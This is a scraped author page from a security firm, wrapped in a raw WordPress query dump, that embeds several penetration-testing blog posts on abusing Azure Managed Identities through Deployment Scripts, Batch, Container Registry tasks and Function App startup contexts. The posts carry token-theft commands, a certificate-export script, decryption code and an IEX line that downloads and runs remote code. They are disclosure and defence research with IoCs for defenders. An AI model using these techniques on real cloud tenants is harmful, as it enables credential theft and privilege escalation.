Karl Fosaaen

As a VP of Research, Karl is part of a team developing new services and product offerings at NetSPI. Karl previously oversaw the Cloud Penetration Testing service lines at NetSPI and is one of the founding members of NetSPI's Portland, OR team. Karl has a Bachelors of Computer Science from the University of Minnesota and has been in the security consulting industry for 15 years. Karl spends most of his research time focusing on Azure security and contributing to the NetSPI blog. As part of this research, Karl created the MicroBurst toolkit to house many of the PowerShell tools that he uses for testing Azure. In 2021, Karl co-authored the book "Penetration Testing Azure for Ethical Hackers" with David Okeyode.
More by Karl Fosaaen
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [search_columns] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
					SELECT   wp_posts.ID
					FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
					WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{89621cb102834bb8dba3a3b986b77673086ec4866ab1a33fba4dac8f382e8ebc}\"10\"{89621cb102834bb8dba3a3b986b77673086ec4866ab1a33fba4dac8f382e8ebc}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{89621cb102834bb8dba3a3b986b77673086ec4866ab1a33fba4dac8f382e8ebc}\"10\"{89621cb102834bb8dba3a3b986b77673086ec4866ab1a33fba4dac8f382e8ebc}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
					GROUP BY wp_posts.ID
					ORDER BY wp_posts.post_date DESC
					
				
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 32110
                    [post_author] => 10
                    [post_date] => 2024-03-14 08:00:00
                    [post_date_gmt] => 2024-03-14 13:00:00
                    [post_content] => 

As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to utilize the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker, with the correct permissions in a subscription, can assign these identities to resources that they control, and can get access to the permissions of the identity. 

When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:

Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities. 

The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post - “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.

TL;DR 

  • Attackers may get access to a role that allows assigning a Managed Identity to a resource 
  • Deployment Scripts allow attackers to attach a User-Assigned Managed Identity 
  • The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container 
  • Depending on the permissions of the Managed Identity, this can be used for privilege escalation 
  • We wrote a tool to automate this process 

What are Deployment Scripts? 

As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.

In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.

Automating the Process

In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.

This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:

Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }

Keep in mind that the Get-AzRoleAssignment call listed above will only get the role assignments that your authenticated user can read. There is potential that a Managed Identity has permissions in other subscriptions that you don’t have access to. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but keep in mind that the identity may have roles in Subscriptions (or Management Groups) that you don’t have read permissions on.

Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:

  • Enumerate available User-Assigned Managed Identities and their role assignments
  • Select the identity to target
  • Generate the malicious Deployment Script ARM template
  • Create a randomly named Deployment Script with the template
  • Get the output from the Deployment Script
  • Remove the Deployment Script and Resource Group Deployment

Since we don’t have an easy way of determining if your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (Write permissions) on the Resource Group containing the User-Assigned Managed Identity, and will use that Resource Group for the Deployment Script.

If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.

Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.

Example Usage:

We have three different use cases for the function:

  1. Deploy to the Resource Group containing the target User-Assigned Managed Identity
Invoke-AzUADeploymentScript -Verbose
  1. Deploy to a different Resource Group in the same Subscription
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
  1. Deploy to a Resource Group in a different Subscription in the same tenant
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"

*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.

Additional Use Cases

Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.

Below are a couple of potential use cases and commands to use:

  • Run commands on VMs
  • Create RBAC Role Assignments
  • Dump Key Vaults, Storage Account Keys, etc.

Since the function expects string data as the output from the Deployment Script, make sure that you format your “-command” output in the parameter to ensure that your command output is returned.

Example:

Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json”

Lastly, if you’re running any particularly complex commands, then you may be better off loading in your PowerShell code from an external source as your “–Command” parameter. Using the Invoke-Expression (IEX) function in PowerShell is a handy way to do this.

Example:

IEX(New-Object System.Net.WebClient).DownloadString(‘https://example.com/DeploymentExec.ps1’) |  Out-String

Indicators of Compromise (IoCs)

We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.

Operation NameDescription
Microsoft.Resources/deployments/validate/actionValidate Deployment
Microsoft.Resources/deployments/writeCreate Deployment
Microsoft.Resources/deploymentScripts/writeWrite Deployment Script
Microsoft.Storage/storageAccounts/writeCreate/Update Storage Account
Microsoft.Storage/storageAccounts/listKeys/actionList Storage Account Keys
Microsoft.ContainerInstance/containerGroups/writeCreate/Update Container Group
Microsoft.Resources/deploymentScripts/deleteDelete Deployment Script
Microsoft.Resources/deployments/deleteDelete Deployment

It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.

Conclusion

While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.

References:

[post_title] => Azure Deployment Scripts: Assuming User-Assigned Managed Identities [post_excerpt] => Learn how to use Deployment Scripts to complete faster privilege escalation with Azure User-Assigned Managed Identities. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-user-assigned-managed-identities-via-deployment-scripts [to_ping] => [pinged] => [post_modified] => 2024-03-14 10:26:46 [post_modified_gmt] => 2024-03-14 15:26:46 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=32110 [menu_order] => 2 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 31943 [post_author] => 10 [post_date] => 2024-02-28 10:41:24 [post_date_gmt] => 2024-02-28 16:41:24 [post_content] =>

We’ve recently seen an increased adoption of the Azure Batch service in customer subscriptions. As part of this, we’ve taken some time to dive into each component of the Batch service to help identify any potential areas for misconfigurations and sensitive data exposure. This research time has given us a few key areas to look at in the Azure Batch service, that we will cover in this blog. 

TL;DR

  • Azure Batch allows for scalable compute job execution
    • Think large data sets and High Performance Computing (HPC) applications 
  • Attackers with Reader access to Batch can: 
    • Read sensitive data from job outputs 
    • Gain access to SAS tokens for Storage Account files attached to the jobs 
  • Attackers with Contributor access can: 
    • Run jobs on the batch pool nodes 
    • Generate Managed Identity tokens 
    • Gather Batch Access Keys for job execution persistence 

The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets. 

While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.

Service Background - Pools 

The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here: 

  • User-Assigned Managed Identity 
    • Can be shared across the pool to allow workers to act as a specific Managed Identity 
  • Mount configuration 
    • Using a Storage Account Key or SAS token, you can add data storage mounts to the pool 
  • Application packages 
    • These are applications/executables that you can make available to the pool 
  • Certificates 
    • This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials 

The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.

The “Resource files” for the pool allow you to select blobs or containers to make available for the “Start Task”. The nice thing about the option is that it will generate the Storage Account SAS tokens for you.

While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.

We have reported this issue to MSRC (see disclosure timeline below), as it’s an information disclosure issue, but this is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL would have the ability to read all of the files in the Storage Account Container. The default window for these tokens is 7 days, so the window is slightly limited, but we have seen tokens configured with longer expiration times.

The last item that we will cover for the pool start task is the “Environment settings”. It’s not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environmental variables. Your mileage may vary with each Batch account that you look at, but we’ve had good luck with finding sensitive information in these variables.

Service Background - Jobs

Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.). 

Generating Managed Identity Tokens from Batch

With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities. 

If there’s a User Assigned Managed Identity that you’d like to generate tokens for, that isn’t already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult. When we started investigating the service, we had to request a pool quota increase just to start using the service. So, keep that in mind if you’re thinking about creating a new pool.

To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.

In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.

(Invoke-WebRequest -Uri ‘http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/’ -Method GET -Headers @{Metadata=”true”} -UseBasicParsing).Content

To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository - https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts

If you’re new to escalating with Managed Identities in Azure, here are a few posts that will be helpful:

Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.

Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.

Exporting Certificates from Batch Nodes

While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.

If there are certificates configured for the Pool, you can review them in the pool settings.

Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.

$mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText
Get-ChildItem -Path cert:\currentUser\my\| ForEach-Object{ 
    try{ Export-PfxCertificate -cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null
    [Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'\',$_.PSChildName,'.pfx'))))
    remove-item (-join($PWD,'\',$_.PSChildName,'.pfx'))
    }
    catch{}
}

Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.

$b64 = “MII…[Your Base64 Certificate Data]”
[IO.File]::WriteAllBytes("$PWD\testCertificate.pfx",[Convert]::FromBase64String($b64))

Note that the PFX certificate uses "TotallyNotaHardcodedPassword..." as a password. You can change the password in the first line of the extraction code.

Automating Information Gathering

Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.

The function collects the following information:

  • Pools Data
    • Environment Variables
  • Start Task Commands
    • Available Storage Container URLs
  • Jobs Data
    • Environment Variables
    • Tasks (Job Preparation, Job Manager, and Job Release)
    • Jobs Sub-Tasks
    • Available Storage Container URLs
  • With Contributor Level Access
    • Primary and Secondary Keys for Triggering Jobs

While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.

Tool Usage:

Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:

PS C:\> Get-AzBatchAccountData -folder BatchOutput -Verbose
VERBOSE: Logged In as kfosaaen@example.com
VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription
VERBOSE: 	1 Batch Account(s) Enumerated
VERBOSE: 		Attempting to dump data from the testspi account
VERBOSE: 			Attempting to dump keys
VERBOSE: 			1 Pool(s) Enumerated
VERBOSE: 				Attempting to dump pool data
VERBOSE: 			13 Job(s) Enumerated
VERBOSE: 				Attempting to dump job data
VERBOSE: 		Completed dumping of the testspi account

This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.

Conclusion

As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:

We determined that this behavior is considered to be 'by design'. Please find the notes below.

Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.

In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.

References:

[post_title] => Extracting Sensitive Information from the Azure Batch Service  [post_excerpt] => The added power and scalability of Batch Service helps users run workloads significantly faster, but misconfigurations can unintentionally expose sensitive data. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => extracting-sensitive-information-from-azure-batch-service [to_ping] => [pinged] => [post_modified] => 2024-02-28 10:41:26 [post_modified_gmt] => 2024-02-28 16:41:26 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31943 [menu_order] => 6 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 31693 [post_author] => 10 [post_date] => 2024-01-04 09:00:00 [post_date_gmt] => 2024-01-04 15:00:00 [post_content] =>

In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the "Tasks" functionality.  

This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you. 

TL;DR 

  • Azure Container Registries (ACRs) can have attached Managed Identities 
  • Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities 
  • We've created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path 

Previous Research 

To be fully transparent, this blog and tooling was a result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked copy and paste-able commands that I could use to recreate the attack. While the original blog focuses on overwriting existing tasks, we will be focusing on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.

Attack Process Overview 

Here is the general attack flow that we will be following: 

  1. The attacker has Contributor (Write) access on the ACR 
  • Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue 
  1. The attacker creates a malicious YAML task file  
  • The task authenticates to the Az CLI as the Managed Identity, then generates a token 
  1. A Task is created with the AZ CLI and the YAML file 
  2. The Task is run in the ACR Task container 
  3. The token is written to the Task output, then retrieved by the attacker 

If you want to replicate the attack using the AZ CLI, use the following steps:

  1. Authenticate to the AZ CLI (AZ Login) with an account with the Contributor role on the ACR
  2. Identify the available Container Registries with the following command:
az acr list
  1. Write the following YAML to a local file (.\taskfile) 
version: v1.1.0 
steps: 
  - cmd: az login --identity --allow-no-subscriptions 
  - cmd: az account get-access-token 
  1. Note that this assumes you are using a System Assigned Managed Identity, if you're using a User-Assigned Managed Identity, you will need to add a "--username <client_id|object_id|resource_id>" to the login command 
  2. Create the task in the ACR ($ACRName) with the following command 
az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system] 
  1. If you're using a User-Assigned Managed Identity, replace [system] with the resource path ("/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/
    Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentitiy>") for the identity you want to use 
  2. Use the following command to run the command in the ACR 
az acr task run -n sample_acr_task -r $acrName 
  1. The task output, including the token, should be displayed in the output for the run command. 
  2. Next, we will want to delete the task with the following command 
az acr task delete -n sample_acr_task -r $acrName -y 

Please note that while the task may be deleted, the "Runs" of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn't a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token. 

Automating Managed Identity Token Extraction in Azure Container Registries

Invoke-AzACRTokenGenerator Usage/overview 

To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.  

A couple of things to note: 

  • The function will prompt (via Out-GridView) you for a Subscription to use and for the ACRs that you want to target 
    • Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once 
  • By default, the function generates tokens for the "Management" (https://management.azure.com/) service 
    • If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter. 
    • Two commonly used options: 
  1. https://graph.microsoft.com/ - Used for accessing the Graph API
  2. https://vault.azure.net – Used for accessing the Key Vault API 
  • The Output is a Data Table Object that can be assigned to a variable  
    • $tokens = Invoke-AzACRTokenGenerator 
    • This can also be appended with a "+=" to add tokens to the object 
  1. This is handy for storing multiple token scopes (Management, Graph, Vault) in one object 

This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session: 

Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1 

Once imported, the function is simple to use: 

Invoke-AzACRTokenGenerator -Verbose 

Example Output:

Automating Managed Identity Token Extraction in Azure Container Registries

Indicators of Compromise (IoCs) 

To better support the defenders out there, we've included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack. 

Operation Name Description 
Microsoft.ContainerRegistry/registries/tasks/write Create or update a task for a container registry. 
Microsoft.ContainerRegistry/registries/scheduleRun/action Schedule a run against a container registry. 
Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/actionGet the log SAS URL for a run. 
Microsoft.ContainerRegistry/registries/tasks/delete Delete a task for a container registry.

Conclusion 

The Azure ACR tasks functionality is very helpful for automating the lifecycle of a container, but permissions misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.  

If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should look at existing task files to see if there are any malicious tasks, and make sure that you monitor the actions that we noted above. 

[post_title] => Automating Managed Identity Token Extraction in Azure Container Registries [post_excerpt] => Learn the processes used to create a malicious Azure Container Registry task that can be used to export tokens for Managed Identities attached to an ACR. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => automating-managed-identity-token-extraction-in-azure-container-registries [to_ping] => [pinged] => [post_modified] => 2024-01-03 15:13:38 [post_modified_gmt] => 2024-01-03 21:13:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31693 [menu_order] => 19 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 31440 [post_author] => 10 [post_date] => 2023-11-16 09:00:00 [post_date_gmt] => 2023-11-16 15:00:00 [post_content] =>

As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized. 

TL;DR 

  1. The Linux containers in Azure Function Apps utilize an encrypted start up context file hosted in Azure Storage Accounts
  2. The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container
  3. This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of the November 11, 2023, this issue has been fully addressed by Microsoft. 

In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App. 

As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.  

Here is the PowerShell sample code that we started with:

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

$encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".") 

$key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY) 
$iv = [System.Convert]::FromBase64String($encryptedContext[0]) 
$encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1]) 

$aes = [System.Security.Cryptography.AesManaged]::new() 
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC 
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 
$aes.Key = $key 
$aes.IV = $iv 

$decryptor = $aes.CreateDecryptor() 
$plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length) 
$plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes) 

$body =  $plainText 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
})

At a high-level, this PowerShell code takes in the environmental variable for the SAS tokened URL and gathers the encrypted context to a variable. We then set the decryption key to the corresponding environmental variable, the IV to the start section of the of encrypted context, and then we complete the AES decryption, outputting the fully decrypted context to the HTTP response. 

When building this code, we used an existing Function App in our subscription that had a managed Identity attached to it. Upon inspection of the decrypted startup context, we noticed that there was a previously unnoticed “MSISpecializationPayload” section of the configuration that contained a list of Identities attached to the Function App. 

"MSISpecializationPayload": { 
    "SiteName": "notarealfunctionapp", 
    "MSISecret": "57[REDACTED]F9", 
    "Identities": [ 
      { 
        "Type": "SystemAssigned", 
        "ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/", 
        "ResourceId": "", 
        "Certificate": "MIIK[REDACTED]H0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      }, 
      { 
        "Type": "UserAssigned", 
        "ClientId": "[REDACTED]", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]", 
